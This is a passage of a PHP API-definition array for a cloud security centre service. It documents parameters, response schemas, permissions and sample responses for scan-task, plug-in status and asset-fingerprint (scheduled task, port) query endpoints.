'example' => '1640102400000', 'title' => ''], 'ResultInfo' => ['description' => 'The execution result.', 'type' => 'string', 'example' => 'TASK_NOT_SUPPORT_REGION', 'title' => ''], 'Target' => ['description' => 'The task target.', 'type' => 'string', 'example' => '238cf050a7270dd6940602e70f1e5a11eeaf4e02035f445b7f613ff5e064****', 'title' => ''], 'TaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => '9fb50f2af8bb67c9fdb684194c83****', 'title' => ''], 'FinishCount' => ['description' => 'The number of completed records.', 'type' => 'string', 'example' => '67', 'title' => ''], 'TargetType' => ['description' => 'The scan object type. Valid values:'."\n" .'- **IMAGE_REPO**: Image repository.'."\n" .'- **IMAGE**: Image.', 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'TaskImageInfo' => [ 'description' => 'The image scan-related information.', 'type' => 'object', 'properties' => [ 'RepoId' => ['description' => 'The image repository ID.', 'type' => 'string', 'example' => 'crr-r88w2vryp8m****', 'title' => ''], 'Digest' => ['description' => 'The image digest.', 'type' => 'string', 'example' => '9e0dc29d872d2e386cc5c0c92b529a84e3acfade16f5cb1d054a2ee3c99****', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => 'v1.20-002-a2*****', 'title' => ''], 'RepoRegionId' => ['description' => 'The region ID of the image repository.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'RepoName' => ['description' => 'The image repository name.', 'type' => 'string', 'example' => 'testyyy', 'title' => ''], 'RepoNamespace' => ['description' => 'The image namespace.', 'type' => 'string', 'example' => 'bitn***', 'title' => ''], 'RegionId' => ['description' => 'The region where the server image is located.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Image' => ['description' => 'The container image.', 'type' => 'string', 'example' => '***s.com/sas_test/baseli***', 'title' => ''], 'Pod' => ['description' => 'The image pod information.', 'type' => 'string', 'example' => 'expoit-law-****', 'title' => ''], 'AppName' => ['description' => 'The application name.', 'type' => 'string', 'example' => 'ack-jenkins-****', 'title' => ''], 'NodeName' => ['description' => 'The node name.', 'type' => 'string', 'example' => 'pztest****', 'title' => ''], 'NodeIp' => ['description' => 'The node IP address.', 'type' => 'string', 'example' => '172.18.XXX.XXX', 'title' => ''], 'NodeInstanceId' => ['description' => 'The node instance ID.', 'type' => 'string', 'example' => 'i-0xi5mxvtmfw9****', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'a765ba1435e7f9446065370e9a41****', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'ACK-test-****', 'title' => ''], 'CostTimeInfo' => ['description' => 'The time consumption statistics in JSON format, showing the end time of each item. Valid values:'."\n" .'- **vul**: System vulnerability.'."\n" .'- **scaVul**: Application vulnerability.'."\n" .'- **baseline**: Baseline.'."\n" .'- **binary**: Binary.'."\n" .'- **forbiddenPackageInfo**: Forbidden installation.'."\n" .'- **identificationInfo**: Identity authentication.'."\n" .'- **script**: Malicious script.'."\n" .'- **sensitiveFile**: Sensitive file.'."\n" .'- **sensitiveInfo**: AK detection.'."\n" .'- **webshell**: Web shell.', 'type' => 'string', 'example' => '{"scaVul":"2023-09-04 09:37:21","identificationInfo":"2023-09-04 09:37:30","forbiddenPackageInfo":"2023-09-04 09:37:16","binary":"2023-09-04 09:37:25","baseline":"2023-09-04 09:37:19","sensitiveFile":"2023-09-04 09:38:34","vul":"2023-09-04 09:37:31","webshell":"2023-09-04 09:38:27","sensitiveInfo":"2023-09-04 09:37:16","script":"2023-09-04 09:39:44"}', 'title' => ''], 'RegistryType' => ['description' => 'The type of the image repository. Valid values:'."\n" .'- **acr**: acr.'."\n" .'- **harbor**: harbor.'."\n" .'- **quay**: quay.'."\n" .'- **CI/CD**: CI/CD repository type.', 'type' => 'string', 'example' => 'acr', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve subtask information of a one-time task', 'summary' => 'Retrieves the details of subtasks for a one-time scan task result, including image scanning and image asset synchronization.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeOnceTaskLeafRecordPage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeOnceTaskLeafRecordPage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 16,\\n \\"Count\\": 6\\n },\\n \\"OnceTasks\\": [\\n {\\n \\"Status\\": \\"0\\",\\n \\"StatusText\\": \\"SUCCESS\\",\\n \\"Progress\\": 75,\\n \\"RealRunTime\\": 1670307567000,\\n \\"TaskName\\": \\"IMAGE_SCAN\\",\\n \\"Finish\\": 1,\\n \\"TotalCount\\": \\"30\\",\\n \\"EndTime\\": 1670307567000,\\n \\"TaskType\\": \\"IMAGE_SCAN\\",\\n \\"StartTime\\": 1640102400000,\\n \\"ResultInfo\\": \\"TASK_NOT_SUPPORT_REGION\\",\\n \\"Target\\": \\"238cf050a7270dd6940602e70f1e5a11eeaf4e02035f445b7f613ff5e064****\\",\\n \\"TaskId\\": \\"9fb50f2af8bb67c9fdb684194c83****\\",\\n \\"FinishCount\\": \\"67\\",\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"TaskImageInfo\\": {\\n \\"RepoId\\": \\"crr-r88w2vryp8m****\\",\\n \\"Digest\\": \\"9e0dc29d872d2e386cc5c0c92b529a84e3acfade16f5cb1d054a2ee3c99****\\",\\n \\"Tag\\": \\"v1.20-002-a2*****\\",\\n \\"RepoRegionId\\": \\"cn-hangzhou\\",\\n \\"RepoName\\": \\"testyyy\\",\\n \\"RepoNamespace\\": \\"bitn***\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Image\\": \\"***s.com/sas_test/baseli***\\",\\n \\"Pod\\": \\"expoit-law-****\\",\\n \\"AppName\\": \\"ack-jenkins-****\\",\\n \\"NodeName\\": \\"pztest****\\",\\n \\"NodeIp\\": \\"172.18.XXX.XXX\\",\\n \\"NodeInstanceId\\": \\"i-0xi5mxvtmfw9****\\",\\n \\"ClusterId\\": \\"a765ba1435e7f9446065370e9a41****\\",\\n \\"ClusterName\\": \\"ACK-test-****\\",\\n \\"CostTimeInfo\\": \\"{\\\\\\"scaVul\\\\\\":\\\\\\"2023-09-04 09:37:21\\\\\\",\\\\\\"identificationInfo\\\\\\":\\\\\\"2023-09-04 09:37:30\\\\\\",\\\\\\"forbiddenPackageInfo\\\\\\":\\\\\\"2023-09-04 09:37:16\\\\\\",\\\\\\"binary\\\\\\":\\\\\\"2023-09-04 09:37:25\\\\\\",\\\\\\"baseline\\\\\\":\\\\\\"2023-09-04 09:37:19\\\\\\",\\\\\\"sensitiveFile\\\\\\":\\\\\\"2023-09-04 09:38:34\\\\\\",\\\\\\"vul\\\\\\":\\\\\\"2023-09-04 09:37:31\\\\\\",\\\\\\"webshell\\\\\\":\\\\\\"2023-09-04 09:38:27\\\\\\",\\\\\\"sensitiveInfo\\\\\\":\\\\\\"2023-09-04 09:37:16\\\\\\",\\\\\\"script\\\\\\":\\\\\\"2023-09-04 09:39:44\\\\\\"}\\",\\n \\"RegistryType\\": \\"acr\\"\\n }\\n }\\n ]\\n}","type":"json"}]', ], 'DescribePluginSummary' => [ 'summary' => 'Queries statistics on the client plug-in installation status.', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'PluginName', 'in' => 'query', 'schema' => ['description' => 'The name of the plug-in. Valid values:'."\n" ."\n" .'* alinet: AliNet.'."\n" .'* alisecguard: client protection.'."\n" .'* alihips: AliHips.'."\n", 'type' => 'string', 'required' => false, 'example' => 'alihips', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response.**** Valid values:'."\n" ."\n" .'* **zh** (default)'."\n" .'* **en**'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E****'], 'Data' => [ 'description' => 'The details of the plug-in data.'."\n", 'type' => 'object', 'properties' => [ 'OnlineCnt' => ['description' => 'The number of hosts on which the plug-in is online.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'OfflineCnt' => ['description' => 'The number of hosts on which the plug-in is offline.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'FailedCnt' => ['description' => 'The number of hosts on which the plug-in failed to be installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'SwitchOffCnt' => ['description' => 'The number of hosts for which the plug-in is not enabled.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'TotalCnt' => ['description' => 'The total number of hosts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'FailedReasons' => [ 'description' => 'The causes of installation failures.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Reason' => ['description' => 'The cause of the installation failure.'."\n", 'type' => 'string', 'example' => 'Other', 'title' => ''], 'Count' => ['description' => 'The number of hosts on which the installation failed for this reason.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Code' => ['description' => 'The error code for the installation failure.'."\n", 'type' => 'string', 'example' => '-1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DescribePluginSummary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePluginSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePluginSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E****\\",\\n \\"Data\\": {\\n \\"OnlineCnt\\": 10,\\n \\"OfflineCnt\\": 2,\\n \\"FailedCnt\\": 3,\\n \\"SwitchOffCnt\\": 5,\\n \\"TotalCnt\\": 20,\\n \\"FailedReasons\\": [\\n {\\n \\"Reason\\": \\"Other\\",\\n \\"Count\\": 3,\\n \\"Code\\": \\"-1\\"\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribePropertyCount' => [ 'summary' => 'Queries the statistics of asset fingerprints. The assets include processes, ports, software, accounts, middleware, websites, web services, scheduled tasks, startup items, and databases.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the asset fingerprints. Separate multiple types with commas (,). Valid values:'."\n" ."\n" .'* **port**: port'."\n" .'* **process**: process'."\n" .'* **software**: software'."\n" .'* **user**: account'."\n" .'* **cron**: scheduled task'."\n" .'* **sca**: middleware'."\n" .'* **web**: website'."\n" .'* **database**: database'."\n" .'* **lkm**: kernel module'."\n" .'* **autorun**: startup item'."\n" .'* **web_server**: web service'."\n", 'type' => 'string', 'required' => false, 'example' => 'port,process', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the assets. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '9658314a-7609-4426-afc4-2c924072****,'."\n" .'9658314a-7609-4426-afc4-2c924072****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Process' => ['description' => 'The number of processes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '367', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'User' => ['description' => 'The number of accounts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '214', 'title' => ''], 'Software' => ['description' => 'The number of software assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '111', 'title' => ''], 'Cron' => ['description' => 'The number of scheduled tasks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '123', 'title' => ''], 'Port' => ['description' => 'The number of ports.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'Sca' => ['description' => 'The number of middleware assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '112', 'title' => ''], 'Web' => ['description' => 'The number of websites.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '65', 'title' => ''], 'Database' => ['description' => 'The number of databases.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Lkm' => ['description' => 'The number of kernel modules.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'Autorun' => ['description' => 'The number of startup items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Webserver' => ['description' => 'The number of web services.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '8', 'title' => ''], 'AgentlessScaAiComponent' => ['description' => 'The number of AI tools.', 'type' => 'integer', 'format' => 'int32', 'example' => '13', 'title' => ''], 'AgentlessLlmService' => ['description' => 'The number of AI services.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DescribePropertyCount', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Process\\": 367,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"User\\": 214,\\n \\"Software\\": 111,\\n \\"Cron\\": 123,\\n \\"Port\\": 22,\\n \\"Sca\\": 112,\\n \\"Web\\": 65,\\n \\"Database\\": 2,\\n \\"Lkm\\": 4,\\n \\"Autorun\\": 3,\\n \\"Webserver\\": 8,\\n \\"AgentlessScaAiComponent\\": 13,\\n \\"AgentlessLlmService\\": 3\\n}","type":"json"}]', ], 'DescribePropertyCronDetail' => [ 'summary' => 'Query Asset Fingerprint Scheduled Task Details', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name or IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The path to the scheduled task.'."\n", 'type' => 'string', 'required' => false, 'example' => '/etc/cron.d/root', 'title' => ''], ], [ 'name' => 'User', 'in' => 'query', 'schema' => ['description' => 'The username of the account that runs the scheduled task.'."\n", 'type' => 'string', 'required' => false, 'example' => 'root', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Extend', 'in' => 'query', 'schema' => ['description' => 'Specifies whether fuzzy search by path to the scheduled task is supported. If you want to use fuzzy search, set the parameter to **1**. If you set the parameter to a different value or leave the parameter empty, fuzzy search is not supported.'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve a new page of results. If you set UseNextToken to true, the value of TotalCount is not returned. Valid values:'."\n" ."\n" .'- **true**: The NextToken method is used.'."\n" .'- **false**: The NextToken method is not used.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The value of NextToken that is returned when the NextToken method is used. You do not need to specify this parameter for the first request.', 'type' => 'string', 'required' => false, 'example' => '1426C575705AE8545E8360A6EFA3B***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'B0C4E12E-CCE1-109D-9E62-7B95CBBAEF8C', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NextToken' => ['description' => 'The value of NextToken that is returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'The details of the scheduled tasks.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the scheduled tasks.'."\n", 'type' => 'object', 'properties' => [ 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Ip' => ['description' => 'The IP addresses of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'User' => ['description' => 'The username of the account that runs the scheduled task.'."\n", 'type' => 'string', 'example' => 'root', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server.'."\n", 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****', 'title' => ''], 'Source' => ['description' => 'The path to the scheduled task.'."\n", 'type' => 'string', 'example' => '/etc/cron.d/root', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '100.104.XX.XX', 'title' => ''], 'Cmd' => ['description' => 'The command that is used to run the scheduled task.'."\n", 'type' => 'string', 'example' => '/usr/lib64/sa/sa1 1 1', 'title' => ''], 'Period' => ['description' => 'The interval at which the scheduled task is performed.'."\n", 'type' => 'string', 'example' => '*/10 * * * *', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'hc-host-****', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash value of the path to the scheduled task.'."\n", 'type' => 'string', 'example' => '4cc8f97c2bf9cbabb2c2be2erqw****', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp of the last fingerprint collection. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1649149566000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query Asset Fingerprint Investigation Task List Details', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyCronDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyCronDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"B0C4E12E-CCE1-109D-9E62-7B95CBBAEF8C\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 1,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"InternetIp\\": \\"192.168.XX.XX\\",\\n \\"Ip\\": \\"192.168.XX.XX\\",\\n \\"User\\": \\"root\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"Source\\": \\"/etc/cron.d/root\\",\\n \\"IntranetIp\\": \\"100.104.XX.XX\\",\\n \\"Cmd\\": \\"/usr/lib64/sa/sa1 1 1\\",\\n \\"Period\\": \\"*/10 * * * *\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"Md5\\": \\"4cc8f97c2bf9cbabb2c2be2erqw****\\",\\n \\"CreateTimestamp\\": 1649149566000\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n B0C4E12E-CCE1-109D-9E62-7B95CBBAEF8C\\n \\n 1\\n 10\\n 1\\n 1\\n \\n \\n 2022-04-05 17:06:06\\n 192.168.XX.XX\\n 192.168.XX.XX\\n root\\n i-hp35tftuh52wbp1g****\\n /etc/cron.d/root\\n 100.104.XX.XX\\n /usr/lib64/sa/sa1 1 1\\n */10 * * * *\\n 162eb349-c2d9-4f8b-805c-75b43d4c****\\n hc-host-****\\n 4cc8f97c2bf9cbabb2c2be2erqw****\\n 1649149566000\\n \\n","errorExample":""}]', ], 'DescribePropertyCronItem' => [ 'summary' => 'Queries the scheduled tasks of your assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcefully refresh the data that you want to query. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The path to the scheduled task.'."\n", 'type' => 'string', 'required' => false, 'example' => '/data', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '291B49F9-1685-4005-9D34-606B6F78****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'An array that consists of scheduled tasks.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the scheduled task.'."\n", 'type' => 'object', 'properties' => [ 'Source' => ['description' => 'The path to the scheduled task.'."\n", 'type' => 'string', 'example' => '/data', 'title' => ''], 'Count' => ['description' => 'The number of servers on which the scheduled task is run.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribePropertyCronItem', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyCronItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyCronItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"291B49F9-1685-4005-9D34-606B6F78****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 11,\\n \\"Count\\": 11\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"Source\\": \\"/data\\",\\n \\"Count\\": 23\\n }\\n ]\\n}","type":"json"}]', ], 'DescribePropertyPortDetail' => [ 'summary' => 'Query Details of Asset Fingerprint Port Collection', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name or IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The listening port of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '22', 'title' => ''], ], [ 'name' => 'ProcName', 'in' => 'query', 'schema' => ['description' => 'The name of the server process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sshd', 'title' => ''], ], [ 'name' => 